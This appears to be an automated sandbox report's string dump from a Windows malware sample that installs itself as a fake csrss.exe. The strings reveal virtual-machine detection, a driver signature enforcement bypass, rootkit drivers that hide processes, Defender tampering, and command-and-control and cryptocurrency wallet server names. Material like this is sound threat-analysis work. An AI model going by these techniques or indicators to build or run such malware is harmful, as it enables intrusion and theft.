            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseFloatPhoenicianProcessingPulseEventRST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8casgstatuscmd is nilcomplex128connectiondnsapi.dlldsefix.exedwarf.Attre.keff.orgexitThreadexp mastergetsockoptgoroutine http_proxyimage/jpegimage/webpinvalidptrkeep-alivemSpanInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc()
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: vmmousevmusb$
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgembedded/%sfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknamehttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextorannis.comparse errorprocess: %sraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writetaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion=183wininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> ancientany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scrimsonderivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwsarecvwsasendwup_verxen: %wxennet6 data=%q etypes goal
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmpBinary or memory string: vmsrvc.exe
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: vboxservice.exe
            Source: csrss.exeBinary or memory string: uetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ... H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: throbbingunderflowunhandledw3m/0.5.1wanderingwaterfallweatheredwebsocketxenevtchn} stack=[ MB goal, actual
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: vboxtray.exe
            Source: csrss.exeBinary or memory string: tUsage of %s: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: unknown network workbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCertFindExtensionCreateStdDispatchCryptDecodeObjectDnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfractional secondgp.waiting != nilhandshake failureif-modified-sinceillegal parameterimpersonation: %win string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedpseudo-device: %sread revision: %wrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seek at 0x%0x: %wseeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunknown caller pcwait for GC cyclewine_get_version
            Source: f6oNLRKHUy.exe, 00000003.00000002.372262046.00000000118DA000.00000004.00000001.sdmpBinary or memory string: ?advapi32.dllRegQueryValueExWFragrantButterflyFirewallDefenderhttps://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMicrosoft Windows 10 ProOSArchitecturePatchTime1ZSPWGFTOpenProcessTokenGetTokenInformationS-1-5-18c:\windows\rss\csrss.exeCreateToolhelp32Snapshot[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionsmartscreen.exeShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exef6oNLRKHUy.exeTrustedInstaller.exetrustedinstaller.exef6oNLRKHUy.exeVBoxWddmCloseServiceHandleVBoxMouseVBoxGuestVBoxService\\.\VBoxGuest\\.\VBoxTrayIPC[System Process]vgauthservice.exeSystemvgauthservice.exeRegistryvgauthservice.exesmss.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exefontdrvhost.exevgauthservice.exefontdrvhost.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exedwm.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeMemory Compressionmemory compressionvgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exebackgroundTaskHost.exebackgroundtaskhost.exevgauthservice.exef6oNLRKHUy.exevgauthservice.exeTrustedInstaller.exetrustedinstaller.exevgauthservice.exef6oNLRKHUy.exevgauthservice.exevmmemctlvmusbmouseMemory Compressionmemory compressionsmartscreen.exeShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exefiKKrsNZWTjxp.exefikk
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: vmsrvc.exesvchost.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exespoolsv.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exe
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaClass(CommonCookieCopticDELETEExpectFltMgrFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon[]byte\??\%s\csrss\ufffd
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: vmhgfs$
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: [system process]vboxtray.exe
            Source: csrss.exeBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad message
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmpBinary or memory string: sharedintapp.exesmss.exesharedintapp.execsrss.exesharedintapp.exewininit.exesharedintapp.execsrss.exesharedintapp.exeservices.exesharedintapp.exewinlogon.exesharedintapp.exelsass.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exedwm.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exespoolsv.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesihost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exectfmon.exesharedintapp.exeexplorer.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exedllhost.exesharedintapp.exesharedintapp.exeSearchUI.exesearchui.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exeHxTsr.exehxtsr.exesharedintapp.exesharedintapp.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exedllhost.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exesvchost.exesharedintapp.exesgrmbroker.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.execonhost.exesharedintapp.exeUsoClient.exeusoclient.exesharedintapp.exeUsoClient.exeusoclient.exesharedintapp.exesharedintapp.exedllhost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exef6onlrkhuy.exesharedintapp.exesharedintapp.exef6onlrkhuy.exesharedintapp.exe[system process]vmsrvc.exevmusrvc.exeSystemsystemvmsrvc.exevmusrvc.exeRegistryregistry
            Source: f6oNLRKHUy.exe, 00000003.00000002.372349315.00000000118F6000.00000004.00000001.sdmpBinary or memory string: svchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesihost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exectfmon.exevmsrvc.exevmusrvc.exeexplorer.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeSearchUI.exesearchui.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeHxTsr.exehxtsr.exemvmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesgrmbroker.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exe
            Source: f6oNLRKHUy.exe, 00000003.00000002.372398606.00000000118FE000.00000004.00000001.sdmpBinary or memory string: svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exeWmiPrvSE.exewmiprvse.exedllhost.exeWmiPrvSE.exewmiprvse.exesvchost.exesgrmbroker.exesvchost.exesvchost.exesvchost.exeWmiPrvSE.exewmiprvse.exesvchost.exesvchost.exesvchost.exesvchost.execonhost.exeUsoClient.exeusoclient.exeUsoClient.exeusoclient.exedllhost.exesvchost.exef6onlrkhuy.exef6onlrkhuy.exexennet$
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmpBinary or memory string: systemvmsrvc.exe
            Source: csrss.exeBinary or memory string: ikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexa
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf+inf, n -Inf-inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0.100x%x108020063125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup
            Source: csrss.exeBinary or memory string: emoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Val
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: to unallocated span%%!%c(*big.Float=%s)%s\Sysnative\cmd.exe37252902984619140625Arabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWDHT has wrong lengthDQT has wrong lengthDRI has wrong lengthEgyptian_HieroglyphsEnumProcessModulesExFileTimeToSystemTimeGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetModuleFileNameExWGetModuleInformationGetProcessMemoryInfoGetWindowsDirectoryWIDS_Trinary_OperatorInsufficient StorageIsrael Standard TimeJordan Standard TimeMAX_HEADER_LIST_SIZEMalformed JSON errorMediapartners-GoogleMeroitic_HieroglyphsNtUnmapViewOfSectionNtWriteVirtualMemoryOffline Explorer/2.5ProcessIdToSessionIdQueryServiceConfig2WQueryServiceStatusExRegisterEventSourceWRequest URI Too LongRtlInitUnicodeStringSHGetKnownFolderPathSOF has wrong lengthSOS has wrong lengthSafeArrayDestroyDataSafeArrayGetElemsizeSeek: invalid offsetSeek: invalid whenceSetCurrentDirectoryWSetHandleInformationSetVolumeMountPointWTaipei Standard TimeTerminal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection error: %sconnection timed outcouldn't disable DSEcouldn't get IsAdmincouldn't get serverscouldn't run servicecouldn't set IsAdmincouldn't set serverscouldn't stop PsaSvccouldn't write patchelectrum.hsmiths.comelectrum.taborsky.czelectrum.villocq.comflag: help requestedfloating point errorforcegc: phase errorgc_trigger underflowgetadaptersaddressesgo of nil func valuegopark: bad g statusgzip: invalid headerheader line too longhttp2: stream closedinvalid repeat countinvalid request codeis a named type filejson: Unmarshal(nil json: Unmarshal(nil)key has been revokedmSpanList.insertBackmalformed ciphertextmalloc during signalmultiple SOF markersno such struct fieldnon-empty swept listnorm: invalid whencenot an integer classnotetsleep not on g0number has no digitsnumber of componentsp mcache not flushedpacer: assist ratio=pad length too largepreempt off reason: reflect.Value.SetIntreflect.makeFuncStubrequest file CDN: %wroot\SecurityCenter2runtime: casgstatus runtime: double waitruntime: unknown pc semaRoot rotateRightshort segment lengthsystemdrive is emptytime: invalid numbertrace: out of memoryunexpected network: unknown address typeuser is not an adminverifier host cachedwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundzlib: invalid header gp.gcscanvalid=true
            Source: csrss.exeBinary or memory string: time: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released MB) wo
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmpBinary or memory string: svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exeWmiPrvSE.exewmiprvse.exedllhost.exeWmiPrvSE.exewmiprvse.exesvchost.exesgrmbroker.exesvchost.exesvchost.exesvchost.exeWmiPrvSE.exewmiprvse.exesvchost.exesvchost.exesvchost.exesvchost.execonhost.exevmxnetvmx86$
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: 100-continue152587890625762939453125Bidi_ControlCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
            Source: svchost.exe, 0000001D.00000002.621997919.0000029C4C028000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: csrss.exeBinary or memory string: EndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*
            Source: csrss.exeBinary or memory string: llocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: l}main.isRunningInsideVMWare
            Source: csrss.exeBinary or memory string: releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
            Source: windefender.exe, 00000025.00000002.433836098.0000000000B0A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
